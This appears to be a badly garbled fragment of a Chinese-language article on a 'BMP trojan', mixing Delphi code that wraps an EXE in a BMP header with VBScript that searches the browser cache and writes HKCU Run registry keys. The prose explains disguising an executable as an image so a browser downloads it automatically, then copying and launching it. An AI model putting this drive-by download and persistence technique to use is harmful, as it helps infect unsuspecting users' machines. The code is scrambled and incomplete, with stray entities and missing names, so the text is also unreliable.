【正文】
) then begin //如果運行后沒有兩個參數(shù)則退出 if FileExists(ParamStr(1)) then begin FindFirstFile(Pchar(ParamStr(1)),fd)。 var len,row,col,fs: DWORD。 然而BMP木馬就不同,它把一個EXE文件偽裝成一個BMP圖片文件,欺騙IE自動下載,再利用網(wǎng)頁中的JAVASCRIPT腳本查找客戶端的Internet臨時文件夾,找到下載后的BMP文件,把它拷貝到TEMP目錄。 h,hw: THandle。 while true do begin if (fs mod 12)=0 then begin len:=fs。B39。 PDWORD(buffer[14])^:=40。 untilcol256。 39。 (39。 (39。)。 (39。)。SearchBMPFile (CACHE),mybmp[1].bmp39。 (39。 fname39。)。 (39。 set Lt=(tmp amp。)。 (w136)39。 (39。)。)。)。 (39。)。End Function39。 “”文件主要內容如下: Option Explicit Dim FSO,WSH,CACHE,str Set FSO = CreateObject() Set WSH = CreateObject() CACHE=(HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache) (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs) HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp, SearchBMPFile (CACHE),mybmp[1].bmp () Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys 39。 ) 39。 tmp